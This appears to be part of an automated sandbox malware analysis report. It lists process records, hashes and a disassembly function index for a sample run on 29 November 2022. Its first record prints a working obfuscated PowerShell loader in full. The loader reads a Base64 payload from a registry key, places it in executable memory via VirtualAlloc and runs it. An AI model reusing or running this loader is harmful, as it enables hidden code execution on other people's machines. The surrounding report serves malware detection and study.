                  Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;;
                  Imagebase:0xc20000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Target ID:4
                  Start time:18:23:30
                  Start date:29/11/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c72c0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:7
                  Start time:18:24:32
                  Start date:29/11/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
                  Imagebase:0xd30000
                  File size:2170976 bytes
                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:moderate

                  General

                  Target ID:8
                  Start time:18:24:33
                  Start date:29/11/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"
                  Imagebase:0x1080000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 03265E18 Relevance: 1.6, Strings: 1, Instructions: 377COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @ k
                    • API String ID: 0-3025011885
                    • Opcode ID: 0875caa5f185b7a77db5dafedfa608f13f844f017cd3f72381d1041e21f71168
                    • Instruction ID: e7649a5aecb8e9304f4c8682be4427eccfad740635714e9e79ca48f5842106ac
                    • Opcode Fuzzy Hash: 0875caa5f185b7a77db5dafedfa608f13f844f017cd3f72381d1041e21f71168
                    • Instruction Fuzzy Hash: CCE14E34F042089FCB44EBB4D494AAEB7B2AF89304F25857DD506AB365DF349C46CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326CD38 Relevance: 3.0, Strings: 2, Instructions: 507COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: DK1l$DK1l
                    • API String ID: 0-3187931031
                    • Opcode ID: de9bd2c514fb8d8f32de4316cc85141d8d564e9a399a1fcf5ab87bfc5c5c5550
                    • Instruction ID: edfc754f1122c4cfc451ba5a0073a6dbe08ce8bf9cd17e71d8aa809fc3770916
                    • Opcode Fuzzy Hash: de9bd2c514fb8d8f32de4316cc85141d8d564e9a399a1fcf5ab87bfc5c5c5550
                    • Instruction Fuzzy Hash: FD223A34A00708CFCB15EFA4D4989ADB7B2FF89715B14886AD44A9B364CB75EC86CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326AD50 Relevance: 2.8, Strings: 2, Instructions: 288COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: Xc1l$Xc1l
                    • API String ID: 0-4076191854
                    • Opcode ID: 9fe9db4a7ba09c0dab2d3fb1f5f8df54b43092f21309a394f6d09e41f06d1aec
                    • Instruction ID: 7dd548dff9cd3c67eecced74f465a78258fb43dfbf3ac565377faabda4347a45
                    • Opcode Fuzzy Hash: 9fe9db4a7ba09c0dab2d3fb1f5f8df54b43092f21309a394f6d09e41f06d1aec
                    • Instruction Fuzzy Hash: EAB1E2B4B002058FCB24DF78C48056EB7F6FF85214B1985A9D916DB355DB34EC85CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032B10D0 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (j$(j
                    • API String ID: 0-3238734073
                    • Opcode ID: e367312ac1c9deb7f1537249951e634460b6036d7549091c5d0c6e5997e576a8
                    • Instruction ID: b3eb14c910c049b5636bc4a164e99aea1ae9ce1a6c432c6e9affd3fcc322e030
                    • Opcode Fuzzy Hash: e367312ac1c9deb7f1537249951e634460b6036d7549091c5d0c6e5997e576a8
                    • Instruction Fuzzy Hash: EF515E34B202068FDB04DF69C5949AEBBF6FF89754B1584A9E806DB365DB30EC41CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BDB4A Relevance: 1.7, Strings: 1, Instructions: 411COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: d
                    • API String ID: 0-2564639436
                    • Opcode ID: 251bd1c9e96a9645117eafb94ccdac677f23687af8cdec09633e5622c87bbea8
                    • Instruction ID: 317457164ed10cb0b99f8e8cb92afc0d50e9d76aba15539bd37d470fbb7ff2ef
                    • Opcode Fuzzy Hash: 251bd1c9e96a9645117eafb94ccdac677f23687af8cdec09633e5622c87bbea8
                    • Instruction Fuzzy Hash: A8F1AD35A00606CFCB14DF28C4809EAB7F2FF88354B5989A9D5569B765DB30FC86CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03265E08 Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @ k
                    • API String ID: 0-3025011885
                    • Opcode ID: cc90b7b83565774e4e053877e17ce3112bb97b360808ebe5f52eb0a50a206cc5
                    • Instruction ID: 0a64fb85922bf4571c5cbb8071f4f862758a9503720757b14657837c7832091c
                    • Opcode Fuzzy Hash: cc90b7b83565774e4e053877e17ce3112bb97b360808ebe5f52eb0a50a206cc5
                    • Instruction Fuzzy Hash: F9C12D34F042089FCB14DFB4D494AAEBBB2AF89304F258569D506AB369DF349C46CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03260820 Relevance: 1.5, Strings: 1, Instructions: 286COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: L1j
                    • API String ID: 0-3909831282
                    • Opcode ID: 6367c67f72732b16946d1af54b41bce7bb1bdcfd760d02b409351c04ce6870c0
                    • Instruction ID: 6cd6e1e6993df6780ee0d36ff68db9c7e56e6f420bdf4d0c3fdd6d3b4e2b494d
                    • Opcode Fuzzy Hash: 6367c67f72732b16946d1af54b41bce7bb1bdcfd760d02b409351c04ce6870c0
                    • Instruction Fuzzy Hash: 51C16970A147068FCB14DF69C98099EB7F6BF88304B108968D6469B764DB74FD86CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032B38D8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: \,l
                    • API String ID: 0-2510834803
                    • Opcode ID: edaee0e670eb6503e67751d53311ffcc197201143d2e3f6bff8ec081811324cf
                    • Instruction ID: e47204125ededdca9f465e6c26f1793a7b270a6be3eaac0d4b6c3c78524433c6
                    • Opcode Fuzzy Hash: edaee0e670eb6503e67751d53311ffcc197201143d2e3f6bff8ec081811324cf
                    • Instruction Fuzzy Hash: 3CA12FB4B442189FD708DBA4C850BAF76BAEBC5708F118528D606DF794CFB59C418B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032B38C9 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: \,l
                    • API String ID: 0-2510834803
                    • Opcode ID: 23826f5fe87df4b37f9ec53a55dd23a40472894e3f4f1aa71bdddfa88b9e339c
                    • Instruction ID: 5e9610a6662697db42765c69dacc6d31bda85abaceb4f2c48206c9009e83a00e
                    • Opcode Fuzzy Hash: 23826f5fe87df4b37f9ec53a55dd23a40472894e3f4f1aa71bdddfa88b9e339c
                    • Instruction Fuzzy Hash: D1A13FB4B442189FDB08DBA4C850BAF77BAEB85708F118538D606DF794CFB59C418B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326080F Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: L1j
                    • API String ID: 0-3909831282
                    • Opcode ID: 241e39e05ebaaa275c17b439fb83c97eb216c31ab6e72a9461f0fc87e1a4035c
                    • Instruction ID: 1e1fc9137c1d4098876e96221aadf44ee5723683e0540ccadffff8db4c3258c9
                    • Opcode Fuzzy Hash: 241e39e05ebaaa275c17b439fb83c97eb216c31ab6e72a9461f0fc87e1a4035c
                    • Instruction Fuzzy Hash: 2EA18B30A14706CFCB14DF69C8809AEBBF6FF88304B048968D5469B764DB74E985CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BE5E0 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @ k
                    • API String ID: 0-3025011885
                    • Opcode ID: bd94c89c6646dc75873bc119116b4cd23520a4d412d6ab2337e79afcd4b69e00
                    • Instruction ID: 27e215d256d8c080e3e95c3f4eac9ce5a3e9e6a66eccd1bbcf7964bf06f14d30
                    • Opcode Fuzzy Hash: bd94c89c6646dc75873bc119116b4cd23520a4d412d6ab2337e79afcd4b69e00
                    • Instruction Fuzzy Hash: 5A51E034A043068FCB04EF64D0949AEB7F2EF88314B56CA68C9069BB55DB78AD45CBD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032B1DE0 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: DK1l
                    • API String ID: 0-3416545430
                    • Opcode ID: 10ef8afa98e9ccc5774002162a19a3a47358d04318dd33460388c304169e873d
                    • Instruction ID: 7085976dc98cbfee9454df9665e9838d72f77f1e44738d1abdbf8ab6466a0eef
                    • Opcode Fuzzy Hash: 10ef8afa98e9ccc5774002162a19a3a47358d04318dd33460388c304169e873d
                    • Instruction Fuzzy Hash: 4D51A239B102118FCB14DF68D4948AEBBF2FF8931571984A9D55ACB366CB34EC91CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BE278 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: `oAk
                    • API String ID: 0-1793811094
                    • Opcode ID: c867534912c8a486978e3fab22a73d2fcbaf7835557f5615cabcd2ca5695fad8
                    • Instruction ID: 2ae1a8cc39309d61d23f02efd012c362ecc4f0fbbd2d0b45baff5bf2ad88340c
                    • Opcode Fuzzy Hash: c867534912c8a486978e3fab22a73d2fcbaf7835557f5615cabcd2ca5695fad8
                    • Instruction Fuzzy Hash: F1516838E102148FD704EF68E498BEDB7B2AF88301F15C469E916AB395CB75EC41CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BE276 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: `oAk
                    • API String ID: 0-1793811094
                    • Opcode ID: 049894f6204113753801bc23b5f1f1548ff92aced7a38c50716b1b669cb5bddc
                    • Instruction ID: e4318e15702019ab8ad922ecd4a4d9dc7ebd67b575a5a27780c0e2d6480bc0e5
                    • Opcode Fuzzy Hash: 049894f6204113753801bc23b5f1f1548ff92aced7a38c50716b1b669cb5bddc
                    • Instruction Fuzzy Hash: D6516B38E202148FD714EF68E494BEDB7B2AF88301F15C569E816AB395CB75EC41CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BAF58 Relevance: .7, Instructions: 711COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 53746caacd32e8661e07025e4960a79d016bc1c1f432dc206dfe1cc43ffdf133
                    • Instruction ID: 07a91169210811d13377e560b1fc2b0a09af9a5f5bacbed86863560857e0da11
                    • Opcode Fuzzy Hash: 53746caacd32e8661e07025e4960a79d016bc1c1f432dc206dfe1cc43ffdf133
                    • Instruction Fuzzy Hash: A5428D75A102158FCB14DF68C884EA9B7B6FF89310F1681A9E50ADB361CB31EC85CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03266B70 Relevance: .4, Instructions: 435COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9709e12b00cd28128a47344d1fd36721dfe5007f838f41b63aeaf474ba05677b
                    • Instruction ID: 8f1b7862f1f5490735d48251707f2a351a90862af87a0e78c6144cdcfbbded49
                    • Opcode Fuzzy Hash: 9709e12b00cd28128a47344d1fd36721dfe5007f838f41b63aeaf474ba05677b
                    • Instruction Fuzzy Hash: D4025D38B102058FCB14EBA9D494AAEB7F6EF88304F158469D506EB355DF74EC82CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03260040 Relevance: .3, Instructions: 314COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26c16eba18fe4cba2d651b52b9085fafa908f60100f637942c59a7fea5bb7222
                    • Instruction ID: 8be811bd64efde39cb9cb832a3b395532cbf6e7f5a4522587e025c24e9e64fab
                    • Opcode Fuzzy Hash: 26c16eba18fe4cba2d651b52b9085fafa908f60100f637942c59a7fea5bb7222
                    • Instruction Fuzzy Hash: ECC1C738B042499FDB05DFA4D450BAEBBB6EF88310F158469D506AB395DF34EC81CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326BEA0 Relevance: .3, Instructions: 313COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1d9201d3eecdc91ee62dca3163b3cbecf15066140f7a4b5db4bc9707efbd029e
                    • Instruction ID: 4fa94b51fe91921339926c2e1106902da1ac105fcbbcb3ada9a84d5f64223045
                    • Opcode Fuzzy Hash: 1d9201d3eecdc91ee62dca3163b3cbecf15066140f7a4b5db4bc9707efbd029e
                    • Instruction Fuzzy Hash: 30A1C13072C430DF8A0DBB29A19C43DB5E75FD66513158066E047DB3A8CFB98E9247AA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326BE90 Relevance: .3, Instructions: 303COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7b89b08e57e8ca22f26ec5e28ebf8df4262f9672ac4ade2d91824c00b2826d44
                    • Instruction ID: 4dd3df3fc2a5c95b6d6fac6066e36f3fabba46d457362e5eb86ff046bbddbce9
                    • Opcode Fuzzy Hash: 7b89b08e57e8ca22f26ec5e28ebf8df4262f9672ac4ade2d91824c00b2826d44
                    • Instruction Fuzzy Hash: 7FA1A03072C420DF8A0DBB25A19C43DB6E75FD66513158066E047DB3A8CFF58E9287A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03265698 Relevance: .3, Instructions: 270COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a395fa3494bffa7309270a44c4f71e7230c73611541bcc603518b31fdf16d44
                    • Instruction ID: 70a1e85a9b4896abc06d9af03f43159ef6a01cedffbc8bcf0345657752cf1d91
                    • Opcode Fuzzy Hash: 0a395fa3494bffa7309270a44c4f71e7230c73611541bcc603518b31fdf16d44
                    • Instruction Fuzzy Hash: DCB11E34B102099FCB04DF68D594BAEB7F2AF89218F648469D406AB394DF74ED85CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03265688 Relevance: .2, Instructions: 247COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 424d7a41e78555de3593585261101f7458c124360df89f8523c3ba870c9124cb
                    • Instruction ID: ca92a62d1ddef1fbbf8edf15337ad5d36bcc4d0a2b76c5749392df4a36d2f53f
                    • Opcode Fuzzy Hash: 424d7a41e78555de3593585261101f7458c124360df89f8523c3ba870c9124cb
                    • Instruction Fuzzy Hash: FFA11C34B102099FCB04DF74D494BAEB7F2AF89218F248469D406AB395DF74ED85CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BBE60 Relevance: .2, Instructions: 243COMMON
                    Download Yara Rule
                    Memory Dump Source
